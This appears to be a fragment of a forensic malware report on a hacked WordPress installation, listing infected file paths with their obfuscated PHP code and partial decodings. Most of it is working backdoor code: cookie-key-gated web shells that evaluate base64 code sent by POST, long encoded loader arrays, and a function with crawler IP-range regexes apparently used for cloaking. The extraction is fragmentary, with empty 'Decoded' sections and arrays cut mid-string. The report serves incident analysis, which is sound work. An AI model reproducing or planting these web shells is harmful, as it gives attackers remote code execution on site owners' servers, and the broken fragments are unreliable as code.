Decoded:
function ll($i) {
$a = Array('c2FmZV' . '9tb2' . 'Rl', 'b3Blb' . 'l9i' . 'YXNlZG' . 'ly', 'c2Fm' . 'ZV9tb2Rl' . 'X' .
'2luY2x1ZGVfZ' . 'Gly', 'c2F' . 'mZV9tb2R' . 'lX2V4ZWN' . 'fZG' . 'ly', 'Z' . 'GlzYW' . 'J' . 's' . 'ZV' . '9m' . 'dW5' .
'jdG' . 'lvbnM' . '=', 'YWxs' . 'b3dfd' . 'XJ' . 'sX2ZvcGVu', 'b' . 'WF4X2V4Z' . 'W' . 'N1dGlvbl90aW1l', '' .
'b3V0cH' . 'V' . '0X2J1ZmZlcm' . 'luZw==', '' . 'bW' . 'Vt' . 'b3J5X2xpbW' . 'l' . '0', '' . 'MTZ' . 'N', 'ZXJyb3J' .
'fbG9' . 'n', 'bG9nX2Vy' . 'cm9y' . 'cw==', 'Z' . 'mlsZV9' . '1' . 'c' . 'GxvYW' . 'Rz', 'Y' . 'Wxsb3dfdXJ' . 's' .
'X2ZvcGVu', 'bWF' . '4' . 'X2V4ZWN1d' . 'Glv' . 'bl90aW1l', 'b3' . 'V0c' . 'HV' . '0X2J1ZmZ' . 'lcmluZw==', '' .
'b' . 'W' . 'Vtb' . '3' . 'J5X' . '2x' . 'pbWl0', 'MTZN', 'ZXJ' . 'yb3J' . 'fbG9n', 'bG9nX2Vy' . 'cm9ycw=' . '=',
'ZmlsZ' . 'V9' . '1c' . 'G' . 'xvY' . 'WRz', 'Y' . 'Wxsb3d' . 'f' . 'dXJsX2' . 'ZvcGVu', 'T' . 'W9' . '6aWxs' . 'YS80Lj' .
'A' . 'g' . 'K' . 'GN' . 'v' . 'b' . 'XBhdG' . 'l' . 'ib' . 'GU7' . 'I' . 'E1TS' . 'UUgOC' . '4wOyB' . 'X' . 'aW5kb3d' .
'zIE5UIDY' . 'uM' . 'C' . 'k=', 'c2FmZV9tb2' . 'R' . 'l', '' . 'b3B' . 'lbl9iYXNlZGly', 'a' . 'HR0cDovLw==', '', '' . 'Iy8'
. 'j', 'Lw' . '==', '', '', 'Lw==', 'L' . 'w' . '==', 'QWN' . 'jZXB' . '0LU' . 'xhbmd1Y' . 'Wd' . 'l' . 'OiBlbi11c' . 'ywgZ' .
'W' . '47cT0wLj' . 'UwDQo=', 'Q29ubmVjdGlvb' . 'jogQ2x' . 'v' . 'c2UNCg0' . 'K', '' . 'D' . 'Q' . 'oNC' . 'g==', 'C'
. 'g==', 'PGJyIC8+', '', '' . 'L0' . 'xvY2F0a' . 'W9uXDov', '' . 'TG9jYXRpb2' . '4' . '6IA==', 'DQ=' . '=', 'DQ' .
'oNCg==', '', 'JiM3NiYjMTExJiM5' . 'OSY' . 'j' . 'O' . 'Tcm' . 'IzE' . 'xNiYjMT' . 'A' . '1JiMxMTEm' . 'Iz' . 'E' . 'xM'
. 'C' . 'YjNT' . 'g' . '=', 'TG9' . 'jYXRpb2' . '46', 'R' . 'V' . 'JST1I=', 'NjZc' . 'LjI0O' . 'VwuWz' . 'YtOV' . '1' .
'bMC05X' . 'V' . 'wuWzAtOV0r', 'NzJcL' . 'jE0XC5bMS0yXVswL' . 'TldW' . 'z' . 'AtOV1cLlswLTldKw==',
'NzRcLj' . 'E' . 'yNVw' . 'uWzAtOV0rXC5' . 'bMC05' . 'X' . 'Ss=', 'Nj' . 'VcLjVb' . 'Mi01XVw' . 'uW' . 'zA' .
'tOV0rXC5bMC05X' . 'Ss=', 'Nz' . 'Rc' . 'LjZcLlswLTldK1wu' . 'W' . 'zAtO' . 'V0r', 'N' . 'j' . 'dcLj' . 'E5NVw' .
'uW' . 'zAt' . 'OV0rX' . 'C5bMC05XSs=', '' . 'NzJ' . 'cLjMw' . 'XC5' . 'bM' . 'C' . '05XStc' . 'Ll' . 's' . 'w' . 'LT' .
'ldKw=' . '=', 'MzhcL' . 'lswLTldK1wuWzAtO' . 'V0' . 'rXC5bMC' . '05XSs' . '=', 'M' . 'TI0XC' . '4x' . 'MTV' . 'cL'
. 'jZc' . 'L' . 'lsw' . 'LTl' . 'dKw==', '' . 'OTNcLjE' . '3Ml' . 'w' . 'uOTRcLjIyNw' . '=' . '=', 'Mj' . 'Ey' . 'XC4xM' .
'DBcLj' . 'I' . '1M' . 'FwuMj' . 'E4', 'NzFcL' . 'jE2N' . 'V' . 'wu' . 'MjI' . 'zXC4x' . 'MzQ=', 'MjA5XC4' . '5X' . 'C' .
'4yMzlcLjEw' . 'MQ' . '=' . '=', 'Njdc' . 'LjIxN1wuMTYwX' . 'C5bMC05' . 'X' . 'Ss=', 'NzBcLjk' . 'x' . 'XC4' . 'xO' .
'DBcLj' . 'I1', '' . 'N' . 'jVcL' . 'jkzXC4' . '2Mlwu' . 'M' . 'jQy', 'NzRcLjE5M1wu' . 'M' . 'jQ2X' . 'C4xM' . 'j' . 'k=',
'Mj' . 'EzX' . 'C4' . 'x' . 'NDRcLjE1X' . 'C4zOA' . '==', '' . 'MTk1X' . 'C45' . 'Ml' . 'w' . 'uM' . 'jI' . '5XC4' . 'y', 'N' .
'zBcLjU' . 'wXC' . '4xODlcLjE5MQ==', 'MjE' . '4XC' . '4yOFwuODhcLjk5', 'MTY1XC4x' . 'N' . 'j' . 'Bc' . 'Lj' . 'JcL'
. 'jIw', 'OD' . 'lcLjEyMlwuM' . 'jI0X' . 'C4' . 'yM' . 'zA=', 'Nj' . 'ZcL' . 'jIzMFw' . 'uMTc' . '1' . 'XC4' . 'xM' . 'jQ=',
'Mj' . 'E4XC' . '4xO' . 'F' . 'wuM' . 'Tc' . '0XC4yNw=' . '=', 'NjV' . 'cLjMzX' . 'C44N1wu' . 'OTQ=', 'NjdcLjIx' .
'M' . 'FwuMTExXC4y' . 'ND' . 'E=', 'ODFcLjEzNVwu' . 'MTc1XC43' . 'MA==', 'Nj' . 'R' . 'cLjY5XC' . '4' . 'zNFwu'
. 'MTM0', '' . 'ODlcLjE' . '0OVwu' . 'MjUzXC4' . 'x' . 'Njk=', 'NjRcL' . 'j' . 'Iz' . 'M1' . 'w' . 'uMVs2' . 'LThdW' .
'zEtOV' . '1cLlswLTldK' . 'w==', 'N' . 'j' . 'RcLjI' . 'zM' . '1' . 'wuM' . 'TlbMC0xXV' . 'w' . 'uWz' . 'AtOV0r',
'MjA5' . 'X' . 'C4' . 'x' . 'O' . 'D' . 'VcL' . 'jE' . 'wOFwu' . 'WzAtOV' . '0' . 'r', 'MjA' . '5XC4xODVcLjI1M1' .
'wuWzAtO' . 'V0r', 'M' . 'jA5' . 'X' . 'C44' . 'NVwuM' . 'j' . 'M4' . 'XC5bMC05X' . 'Ss=', 'MjE2XC4y' . 'M' . 'zlcL'
. 'jMzX' . 'C45W' . 'zYtOV0=', '' . 'Mj' . 'E2X' . 'C4yMzlcLjM3XC45WzgtOV0=', '' . 'Mj' . 'E2XC4' . 'yMz' .
'lcLjM5' . 'XC4' . '5Wz' . 'gtOV0=', 'MjE' . '2' . 'XC4' . 'y' . 'M' . 'z' . 'l' . 'cLj' . 'QxXC45WzYtOV' . '0' . '=', 'MjE2'
. 'XC4yM' . 'zl' . 'cLjQ' . '1XC40', 'M' . 'jE2XC' . '4' . 'yMz' . 'lcL' . 'jQ' . '2XC5bMC05XS' . 's' . '=',
'MjE2XC4yMzlcLjUxXC45WzYtOV0' . '=', 'MjE2X' . 'C4' . 'y' . 'M' . 'zlcLj' . 'UzXC45W' . 'zgt' . 'OV0=', 'MjE2' .
'XC4' . 'yMzlcL' . 'jU3XC' . '45Wz' . 'YtOV0=', 'MjE2' . 'XC4yMzlcL' . 'jU5X' . 'C45W' . 'zg' . 'tOV0' . '=', 'MjE2'
@ 8
2.2.4 Location: wp-includes/js/tinymce/plugins/fullscreen-randomfunctions.php

<?php $j_wgaxqw =
array('eNrFOwdX20i3f4WwO','Rv8UaJuaYnzEZppJm','DALZvDkWXZFpZLXLB','NNv/93bl3ZlQsSHib','894m
UZm5c+f2MvKuB','e21jTft2cCbBsPBvb','8IJtPJxrswfJfLrX1','fExNrYbjxNsh9f+sW','Po3H7nLj3butd7V5o','Y
C3d2s77/CRPdTY5Z','N8vZhHj0ubPV6w505','slF1x5rbqWOzFrS7Y','bVK/sRUEYZcHxNs5L','7L75WOztt9lTy
18D4','Nm8S5/esSe1dubu7s','Oe/p8YCBtn5f7NcJr','sluvqeNKdnk6PTLvT','g/rsxJ7O+ghGeyxyi','4Ou1hAzq
TOnm6QUhV','JegBSjhHNqMlu/fJj','Sy/lT4+BjGMY67PBM','ruw8c5teN25vDEWn9','nIcj9sBoimcveEnHa','
8Ae5glXAPw+R7zEo3','vU5ZQ9AHl900G3GyS','+nh0/zzIYoF4ZGFh9','PF5c0+eyq6tbOwgbQ','5BorwqcTZN
BZc2i6y','uWCSVpEl9grks1szx','hJ7B7bYTbAbZw01in','phLKJCkcXK3bKHc2W','tgsS5nHxGOpKC7H9C','tZU
OrztE02LCBkjkx','ApqT1rXWVjvh7gLsn','dgzy8e6oU0Sysa4wY','UYw/1pyMhcTZHsTlk','6zZkV9Ag4mQsEnv
s9','e5pgjAeuwzqoEHDpL','1OZ6XbT7jX6VErrGv','TR9LCKbvOYW6O1nB7','pOAIGm9j5KHlVPpkp','J3H0tL
QiP6jObDo4c','txv1FxpsiGVg5huKk','DRegJTlCvXYaNIgho','6517Ula8wyHKHDwRH','ZX5HbneKbkeeRc4Zs',
'yR8W/cd5Fm+XpdvUQ','WG7X9yEPvUPDdZr+l','1qut8HOwj2JDsgJV9','ZZzFFSjauRRWLe4dE','7ejYvnh9d
DtgUalOb','MyIsqDy1pBIjxsfkw','lCZ3rS2kR3gaork86','CjngAawwSMxzTk/oM','BzVTxbnh4g95ucV2X','xW
NeOFTIfZ1Y7HD4y','iyo6yGi9Viar0Qzrl','KLb4TXdkAikB83jQF','ImJHkWSO/UL4P6Q+k','WVb04C3DM/Hwj
zf2B','LMLrnz4dIVsIj2Nov','SrHtaCxIwlXOqg/XN','52hH4Y2YxkRi4MIW4','eVJELvdVuRe40qWmN','R69Ym
QFo6VqSfoUS7','6inJ5eKX12EVzetB5','LBgqT9MJrWa2ekEc0','YsIer3iWG5WbQQu2e','FnmgQI0iu5Omdtz
jM','kTDP1BQXGV0p+5Z5X','BiX2gd9aoTM8VIddL','XkoplrhFZybxBysFt','E2btaeQ74DdkT4QR/','Qd8h3SN
kkdTAz/CiJ','2xsqaFszoZn9ooVtr','c5biDYpDk4ABaMcj0','L9sYsggUVjzVq2eoE','gDFJa2q+cBzGgq5OS','gJF
us8svH01W6taq9','ZPTbYZrCR2iqGjzwk','KJT9VMFxU68o3gn6F','k7VtDNio98IvT5yPG','uQtyOGKqpm2tTP
TNx','TW4yaSEyoMJNBq7jT','0ESvpZIatbMliRbJb','DeLzoAhhBshqSy9vr','P0orDU6IcTkIPqFcE','XZRIuP0W
8xyxYpvBI','DogVZIESFvLAfCoVg','FiTsgG5RDKpKCALlb','ImymKGy7gsqhWSAfK','PYiL+gffriAuU6NkS','IIFnj
CaSb8FzFE1pK','8Y3QqKKkP9qmfIj45','3pvNVGjolXlEMtyWv','tU6IO48G7fOQcVu7U','Y0ph5fZdD+3sCpUfl
','Wk1euSL7og1EdJubp','C4/bsajjXObo9wAIP','VNQKrx2zZUfe6puKS','Y4pxmJVrmdUgVU/zG','THcmZ0HZ
bt2YA6pqF','NwnI+hIDD9o82WMfF','dBMNe+1j69wwNpnY5','v0AfZnPzmYsx6XJ+h','usW3gXmk9EQ8GN
dwm','Dq6K+N6dnJwpOprH+','peDKYoyIYHYpXnPfO','rxNx5+Jp0W0cGrPzh','9hyCHBXgfPkkjNcPF','FibJyU
NoFqwISqhne','M3JsX+uWIMFH4eUDR','ISi+90+XqK7AkRWTe','53MzLRDUEIXZMRIby','GitFM5QIQlYycDi
Xb','fRLAipKdb49HTejFW','IRudbuLUA07Jeh6lI','DYHQVMQ7ElTQ9zOU7','QZlQa10qbkgUkGZe6','EzRpJBu
f0UpwA7lEP','7pPYieJnU7scc/aE3','3DCepTSPS57B97hGb','NxiWN9aFRNhVIa8YD','Gh9gvqawalIUOnvgS',
't0YOehUY366O5xis6','1pIdvNkUIaccwNYKG','ieg+tNbrqMENyxPrg','mbRMxSY2iZQ8Ro77f','bQ4W/aZmK
u1ieYSRL','+h1aA4pMaEFcgA1ep','CLYqpgzdLQukr7hKp','esrny8LyyeCImR563','HDVLB8qyVptIK2nD/','Hn
QnbdOFnOfWiPw0C','5VxX30/mWjv4AGYKG','5tcsRFOQTF7VWNhlu','wCutz1sOh5RTK0pTR','/RD9OZqu
QfF4IiLBP','VTv9kfev1K/4r6oG8','odJBu/VZatXex7D55','xWNUUrvYeGwOyrKO5','dkVnfCcvOGxQvmcfG','
w+9EiU6OZkOSmR6mU','UJSdriPrXEXFIxXmD','hWO7hc/hk1s9GzWj4','hS16t+EINahVZNBq/','TtvHgMeQf
R2i6R2YO','6YXZ+Y8BcNyQzbQ1B','5Do9I1uKewC4UOACX','+mbTI5Pn6alUMXGpY','STKuyLEh5K+Z+Ube+'
,'kM+JOJsSMQAhDRTbK','4+oGjVkW1CR2EjkF6','uMZF7kN1Qt6+fktGX','ulhiIm/2ZixpyBNR2','3XGQHRR1
QWyhEfRGM','EFXKktCqBcufQ2mcZ','LnITrcb1bHlx3YRi8','9Ro1iG/gwstu9oUIb','0myR2pKjGxcfxMSvv','t
mq4dtSQFWSZ4hPDI','Q8fUBTdU5zvLhtSB3','VhKmiB4NgIAHGB3WV','sOD+5nEdFjRlZa9+Z','gcp7UYtbH0
EQq/DoG','omTAkDCYjGqxkWJhZ','gThdTRIzgrOiralkr','iI5bIQZlzUtFLpSBZ','O3dSclAUKVMRVw8WH','xD+
TCHOz2FMjChCEG','VRqpBU8SDE16XOvVp','3LmRmwHjIRIaqYSJj','4kK6qqbd6CNLM1S1E','BWqnERFrV+
UjPTWHJ','Y8Uhldwe18jrql74M','lIjqlQb2LRVmG4gPP','ZaTQ0VPrhFVmLJyJg','gR1C2Fs324WK/3WQU','hS
pCaBcWLVuL9LLVQ','mMpZfyFYubPl0JDO5','RE4UkpA0Nl5NaJSNL','1TpoyPszKDAGEisNo','HydBv1nldUH
GLt7j2','Z9ukheXajqj5dyUZ4','wlInJbd9+4qsV6ZZF','PWTQaBlci5KcGh17Y','NPNlU85VED3ZKDQtp','kKZNo
@ 9
Decoded:
function ll($i) {
$a = Array('', 'Xw==', 'Xw' . '==', '' . 'X' . 'A==', '' . 'Lw==', '' . 'Ly8=', 'L' . 'g==', '' . 'Ly' . '8=', 'TW96' .
'aWx' . 'sYS80' . 'L' . 'j' . 'AgKG' . 'NvbXBh' . 'dG' . 'libGU7IE' . '1TSUUg' . 'OC4w' . 'OyBX' . 'aW5' . 'kb3' . 'd' .
'zIE5UIDYuM' . 'Ck=', 'T' . 'W' . '9' . '6aWxsY' . 'S' . '81' . 'LjAgKF' . 'dpb' . 'mRvd3M7IFU7IFdpbm' . 'R' .
'vd3MgTlQgNS4xO' . 'yBlbi1' . 'VUz' . 'sgcnY' . '6MS' . '45' . 'LjAuMSkgR2' . 'Vja' . '28' . 'v' . 'MjAwOD' . 'A5'
. 'M' . 'jIxNSB' . 'GaXJlZ' . 'm94L' . 'zMuM' . 'C4x', 'TW96aW' . 'xsYS81LjAgK' . 'Fdp' . 'bmRvd3M7IFU7' .
'IFd' . 'pb' . 'mR' . 'vd3MgTlQ' . 'g' . 'NS4xOy' . 'Blbi1VUyk' . 'gR2V' . 'ja28' . 'vMjAwM' . 'z' . 'A' .
'1MDQgTW96aWxs' . 'Y' . 'SB' . 'G' . 'a' . 'X' . 'JlYmly' . 'Z' . 'C8wLjY=', 'TW96aW' . 'xsY' . 'S' . '81' . 'Lj' .
'AgKFdp' . 'bmRv' . 'd3M' . '7IFU7' . 'IFdpbmRv' . 'd3Mg' . 'Tl' . 'QgN' . 'S4xOyBlbi1V' . 'Uzsg' . 'c' .
'nY6MS45Lj' . 'IuMTAp' . 'IEdlY2tvL' . 'zI' . 'wMTAwO' . 'TE0I' . 'E' . 'Zpcm' . 'Vmb3' . 'gvMy42' . 'LjEw', 'c2' .
'FmZV9t' . 'b2Rl', 'b3Blb' . 'l9iYXNlZGly', 'aHR0cDo' . 'vLw=' . '=', '', '' . 'Iy' . '8' . 'j', 'Lw' . '==', '', '', 'Lw==', '' .
'L' . 'w==', '' . 'QWNj' . 'ZXB0' . 'L' . 'U' . 'xhbmd1YWdlOiBl' . 'b' . 'i11cywg' . 'ZW47c' . 'T0' . 'wL' . 'jU' .
'wDQo=', 'Q' . '29ubm' . 'Vjd' . 'G' . 'l' . 'vbjo' . 'g' . 'Q2x' . 'v' . 'c2U' . 'NCg0K', 'DQoNCg' . '=' . '=', 'Cg==',
'PGJyIC' . '8+', '', 'L0xvY2F0aW' . '9uXDov', 'TG9j' . 'YXRp' . 'b246IA==', 'DQ==', 'D' . 'Qo' . 'N' . 'C' . 'g' . '==',
'', 'Ji' . 'M' . '3NiYjMTE' . 'xJiM' . '5OS' . 'Y' . 'jO' . 'TcmIzEx' . 'NiYjM' . 'T' . 'A1Ji' . 'MxM' . 'TEmIzEx' .
'MCYjNTg=', '' . 'TG9jYXRpb246', 'Y' . 'Wx' . 's' . 'b3dfd' . 'X' . 'JsX2ZvcGVu', 'MQ' . '==', 'PG' .
'g1IHN0eWxlPSdj' . 'b2xv' . 'cjptYXJ' . 'vb24n' . 'PkNh' . 'bid0' . 'IGR' . 'vd' . '2' . '5sb2FkIA==', 'I' . 'C0g' . 'RV'
. 'hJVDs8L2g1Pg==', '', '', '', 'Cg==', '' . 'c' . 'g' . '=' . '=', '', 'c' . 'G' . 'lwZQ==', 'd' . 'w' . '==', '', 'c2FmZV9tb2R' .
'l', '' . 'b3Blbl9i' . 'YX' . 'Nl' . 'ZGl' . 'y', 'c2FmZV9tb2R' . 'lX2luY2x' . '1ZGVfZGly', 'c2' . 'F' . 'mZV9tb2RlX2V4' .
'ZWNfZ' . 'Gly', 'ZGlzYWJs' . 'ZV9' . 'mdW5jdG' . 'lv' . 'bnM' . '=', 'YW' . 'xsb3' . 'dfdX' . 'JsX2ZvcGVu',
'bWF4X2V4ZWN1dGlvb' . 'l90' . 'aW1' . 'l', 'b3V0cH' . 'V0' . 'X2J' . '1ZmZlcml' . 'uZw==', 'b' . 'WV' . 'tb3J5X'
. '2xpbW' . 'l0', 'Mj' . 'U2T' . 'Q==', '' . 'ZXJy' . 'b3' . 'JfbG9n', 'bG9nX' . '2Vycm9ycw=' . '=', 'ZmlsZV91cGxvY'
. 'W' . 'Rz', 'YW' . 'x' . 's' . 'b3' . 'd' . 'fdX' . 'JsX' . '2Zvc' . 'GVu', 'bWF' . '4X2V4' . 'Z' . 'WN1dGlvb' . 'l90aW1l',
'b3V0cHV0X2J1Z' . 'mZlcmlu' . 'Zw==', 'bWVtb3J5X2xpbWl' . '0', 'MjU2TQ=' . '=', 'Z' . 'XJyb3JfbG' . '9n',
'bG9nX2Vycm9yc' . 'w==', 'Z' . 'mlsZV' . '91' . 'cGxvYWR' . 'z', 'YWxsb3df' . 'dX' . 'J' . 'sX2Zvc' . 'GVu', 'XA' .
'==', '' . 'Lw==', 'RE9DVU1FTl' . 'RfUk9' . 'P' . 'VA==', '' . 'XA==', 'Lw==', 'U' . '0' . 'N' . 'SSV' . 'BUX0' . 'ZJTEV' .
'O' . 'QU' . '1F', 'UEhQX1N' . 'FTE' . 'Y=', 'XA==', '' . 'Lw==', '' . 'KF' . 'wu' . 'cGguKiR8XC5o' . 'dG0u' .
'KiR8XC5' . 'za' . 'H' . 'Rt' . 'LiokfF' . 'w' . 'uY' . 'XNwLi' . 'okfFwuan' . 'NwJH' . 'xcLm' . 'podG0k' . 'fFwuY2' .
'ZtJHxc' . 'L' . 'mN0c' . 'C' . 'R' . '8XC50cGwkKQ' . '=' . '=', 'LzxhZD4uKjxc' . 'L' . '2FkPi9zaQ==', 'Lz' .
'xhZHM+Lio8XC' . '9hZH' . 'M+L3Np', 'Lzxi' . 'YjE' . '+Lio8' . 'YmIyP' . 'i9' . 'z' . 'aQ==', '' . 'L' . 'z' . 'xiMT' .
'4uKj' . 'x' . 'c' . 'L2I' . 'x' . 'Pi9zaQ' . '=' . '=', '' . 'Lzxi' . 'YjE+' . 'PGJiMT4vc2k' . '=', 'LzxiYjI+PGJiMj4vc2k=', 'L' .
'zxhZD' . '4uKjxcL2' . 'Fk' . 'P' . 'i' . '9z', '' . 'Lzxl' . 'bXM+' . 'L' . 'io8X' . 'C9lbX' . 'M+' . 'L3M' . '=', 'LzxibG' .
'9jaz4uKjxcL2Js' . 'b2Nr' . 'Pi9' . 'z', 'L' . 'zxkaW' . 'c+Lio8XC9kaWc+L' . '3M=', 'LzxjZW50' . 'cj' . '4u' .
'KjxcL2Nlb' . 'nRyP' . 'i9z', 'LzxjaXR' . 'zPi4qPFwv' . 'Y2l0c' . 'z4v' . 'cw==', 'Lzx0Y' . 'nQ+' . 'Lio8XC90' . 'YnQ' .
'+L3M=', '' . 'L' . 'z' . 'w' . 'oc' . '3Bhbnxmb250fGRpd' . 'ikgc' . '3R' . '5bGU9Lioo' . 'aG' . 'Vp' . 'Z2h0fHdp' .
'ZH' . 'RoKVxz' . 'KjpccypbMC0yXXs' . 'x' . 'fVxzKihwdHxwe' . 'CkuKihv' . 'dmV' . 'yZmxvd3x2aXNpYmlsaX' .
'R5KVxzKjp' . 'c' . 'cyooYX' . 'V0b3x' . 'oa' . 'WRkZW4p' . 'Lio+Lio8YSBocmVmPS' . '4qP' . 'FwvYT4uKj' .
'xcLyhzcGFu' . 'fGZvbnR' . '8' . 'Z' . 'Gl' . '2KT' . '4vVX' . 'Np', 'Lzwoc3Bhbnx' . 'm' . 'b250fGRpd' .
'ikgc3R5bGU9' . 'Lioob' . '3Z' . 'lcm' . 'Zsb3d8dm' . 'lzaWJpbG' . 'l' . '0' . 'eSlccyo6X' . 'H' . 'MqKGF1dG9' .
@ 10
2.2.5 Location: wp-content/plugins/aegis.php
<?php $key = "58e07095da5ce3e402218c18a195bfb6";

$ygoauyrfkcce="\142\x61\163\x65\66\64\137\144\x65\x63\x6f\x64\145";@eval($ygoauyrfkcce($ygoa
uyrfkcce("YVdZb2JXUTFLQ1JmUTA5UFMwbEZXeWRyWlhrblhTa2dQVDBnSkd0bGVTa2dleUJsZG1Gc0lDa
GlZWE5sTmpSZlpHVmpiMlJsS0NSZlVFOVRWRnNpWTI5a1pTSmRLU2s3SUgwPQ=="))); ?>
Decoded:
<?php if (md5($_COOKIE['key']) == $key) {
eval(base64_decode($_POST["code"]));
2.2.6 Location: wp-content/uploads/emmos.php
<?php $key = "dac71e3f5a628b9fe8596c38bd2a15c1";

$a94eec34="\142\x61\163\x65\66\64\137\144\x65\x63\x6f\x64\145";@eval($a94eec34($a94eec34("Y
VdZb2JXUTFLQ1JmUTA5UFMwbEZXeWRyWlhrblhTa2dQVDBnSkd0bGVTa2dleUJsZG1Gc0lDaGlZWE5sTm
pSZlpHVmpiMlJsS0NSZlVFOVRWRnNpWTI5a1pTSmRLU2s3SUgwPQ=="))); ?>
Decoded:
@ 11
2.2.7 Location: wp-content/blogs.dir/swift.php
<?php $key = "000023a6e067957b0f93a8d8ab73497a";

$xszilqrqkyzg="\142\x61\163\x65\66\64\137\144\x65\x63\x6f\x64\145";@eval($xszilqrqkyzg($xszilqrq
kyzg("YVdZb2JXUTFLQ1JmUTA5UFMwbEZXeWRyWlhrblhTa2dQVDBnSkd0bGVTa2dleUJsZG1Gc0lDaGlZ
WE5sTmpSZlpHVmpiMlJsS0NSZlVFOVRWRnNpWTI5a1pTSmRLU2s3SUgwPQ=="))); ?>
Decoded:
2.2.8 Location: wp-content/themes/openvme.php
<?php $key= "f74e3e279a1da05146402e46d3180d94"; eval

(base64_decode("aWYobWQ1KCRfQ09PS0lFWydrZXknXSkgPT0gJGtleSkgeyBldmFsIChiYXNlNjRfZGVjb2Rl
KCRfUE9TVFsiY29kZSJdKSk7IH0=")); ?>
Decoded:
@ 12
2.2.9 Location: wp-includes/ID3/x11r3.php
<?php $key= "0f8a5e8b5e7500d9456678ad7f14e4a2"; eval

(base64_decode("aWYobWQ1KCRfQ09PS0lFWydrZXknXSkgPT0gJGtleSkgeyBldmFsIChiYXNlNjRfZGVjb2Rl
KCRfUE9TVFsiY29kZSJdKSk7IH0=")); ?>
Decoded:
}
2.2.10 Location: wp-includes/js/dcn.php

<?php $key = "8054c0d16739bf06797b50199ec76ab6";
$a94eec34="\142\x61\163\x65\66\64\137\144\x65\x63\x6f\x64\145";@eval($a94eec34($a94eec34("Y
VdZb2JXUTFLQ1JmUTA5UFMwbEZXeWRyWlhrblhTa2dQVDBnSkd0bGVTa2dleUJsZG1Gc0lDaGlZWE5sTm
pSZlpHVmpiMlJsS0NSZlVFOVRWRnNpWTI5a1pTSmRLU2s3SUgwPQ=="))); ?>
Decoded:
}
@ 13
2.2.11 Location: wp-content/backup-db/ieupdate.php

<?php $csunrexg =
array("eNrFOwdX20i3f4WwORv8UaJuaYnzEZppJmDALZvDkWX","ZFpZLXLBNNv/93bl3ZlQsSHib894mUZ
m5c+f2MvKuBe","21jTft2cCbBsPBvb8IJtPJxrswfJfLrX1fExNrYbjxN","sh9f+sWPo3H7nLj3butd7V5oYC3d2s
77/CRPdTY5ZN8","vZhHj0ubPV6w505slF1x5rbqWOzFrS7YbVK/sRUEYZc","HxNs5L7L75WOztt9lTy18D4N
m8S5/esSe1dubu7sOe/","p8YCBtn5f7NcJrsluvqeNKdnk6PTLvTg/rsxJ7O+ghG","eyxyi4Ou1hAzqTOnm6Q
UhVJegBSjhHNqMlu/fJjSy/l","T4+BjGMY67PBMruw8c5teN25vDEWn9nIcj9sBoimcve","EnHa8Ae5glXAPw
+R7zEo3vU5ZQ9AHl900G3GyS+nh0/","zzIYoF4ZGFh9PF5c0+eyq6tbOwgbQ5BorwqcTZNBZc2","i6yuWCS
VpEl9grks1szxhJ7B7bYTbAbZw01inphLKJC","kcXK3bKHc2WtgsS5nHxGOpKC7H9CtZUOrztE02LCBkj","kxA
pqT1rXWVjvh7gLsndgzy8e6oU0Sysa4wYUYw/1py","MhcTZHsTlk6zZkV9Ag4mQsEnvs9e5pgjAeuwzqoEHD
p","L1OZ6XbT7jX6VErrGvTR9LCKbvOYW6O1nB7pOAIGm9j","5KHlVPpkpJ3H0tLQiP6jObDo4ctxv1FxpsiGV
g5huKk","DRegJTlCvXYaNIgho6517Ula8wyHKHDwRHZX5HbneKb","keeRc4ZsyR8W/cd5Fm+XpdvUQWG7
X9yEPvUPDdZr+l1","qut8HOwj2JDsgJV9ZZzFFSjauRRWLe4dE7ejYvnh9dD","tgUalObMyIsqDy1pBIjxsfkwlC
Z3rS2kR3gaork86Cj","ngAawwSMxzTk/oMBzVTxbnh4g95ucV2XxWNeOFTIfZ1","Y7HD4yiyo6yGi9Viar0Qz
rlKLb4TXdkAikB83jQFImJ","HkWSO/UL4P6Q+kWVb04C3DM/Hwjzf2BLMLrnz4dIVsI","j2NovSrHtaCxIwlXO
qg/XN52hH4Y2YxkRi4MIW4eVJE","LvdVuRe40qWmNR69YmQFo6VqSfoUS76inJ5eKX12EVz","etB5LBgqT
9MJrWa2ekEc0YsIer3iWG5WbQQu2eFnmgQ","I0iu5OmdtzjMkTDP1BQXGV0p+5Z5XBiX2gd9aoTM8VI","
ddLXkoplrhFZybxBysFtE2btaeQ74DdkT4QR/Qd8h3S","NkkdTAz/CiJ2xsqaFszoZn9ooVtrc5biDYpDk4ABaM
c","j0L9sYsggUVjzVq2eoEgDFJa2q+cBzGgq5OSgJFus8s","vH01W6taq9ZPTbYZrCR2iqGjzwkKJT9VMFxU68
o3gn6","Fk7VtDNio98IvT5yPGuQtyOGKqpm2tTPTNxTW4yaSEy","oMJNBq7jT0ESvpZIatbMliRbJbDeLzoAh
hBshqSy9vr","P0orDU6IcTkIPqFcEXZRIuP0W8xyxYpvBIDogVZIESF","vLAfCoVgFiTsgG5RDKpKCALlbImymK
Gy7gsqhWSAfKP","YiL+gffriAuU6NkSIIFnjCaSb8FzFE1pK8Y3QqKKkP9","qmfIj453pvNVGjolXlEMtyWvtU6I
O48G7fOQcVu7UY0","ph5fZdD+3sCpUflWk1euSL7og1EdJubpC4/bsajjXOb","o9wAIPVNQKrx2zZUfe6puK
SY4pxmJVrmdUgVU/zGTHc","mZ0HZbt2YA6pqFNwnI+hIDD9o82WMfFdBMNe+1j69ww","NpnY5v0AfZnP
zmYsx6XJ+husW3gXmk9EQ8GNdwmDq6K","+N6dnJwpOprH+peDKYoyIYHYpXnPfOrxNx5+Jp0W0cG","rP
zh9hyCHBXgfPkkjNcPFFibJyUNoFqwISqhneM3JsX","+uWIMFH4eUDRISi+90+XqK7AkRWTe53MzLRDUEIX
ZMR","IbyGitFM5QIQlYycDiXbfRLAipKdb49HTejFWIRudbu","LUA07Jeh6lIDYHQVMQ7ElTQ9zOU7QZlQa1
0qbkgUkGZ","e6EzRpJBuf0UpwA7lEP7pPYieJnU7scc/aE33DCepTS","PS57B97hGbNxiWN9aFRNhVIa8YDG
h9gvqawalIUOnvg","St0YOehUY366O5xis61pIdvNkUIaccwNYKGieg+tNbr","qMENyxPrgmbRMxSY2iZQ8R
o77fbQ4W/aZmKu1ieYSRL","+h1aA4pMaEFcgA1epCLYqpgzdLQukr7hKpesrny8Lyy","eCImR563HDVLB8q
yVptIK2nD/HnQnbdOFnOfWiPw0C5","VxX30/mWjv4AGYKG5tcsRFOQTF7VWNhluwCutz1sOh5","RTK0pT
R/RD9OZquQfF4IiLBPVTv9kfev1K/4r6oG8od","JBu/VZatXex7D55xWNUUrvYeGwOyrKO5dkVnfCcvOGx","
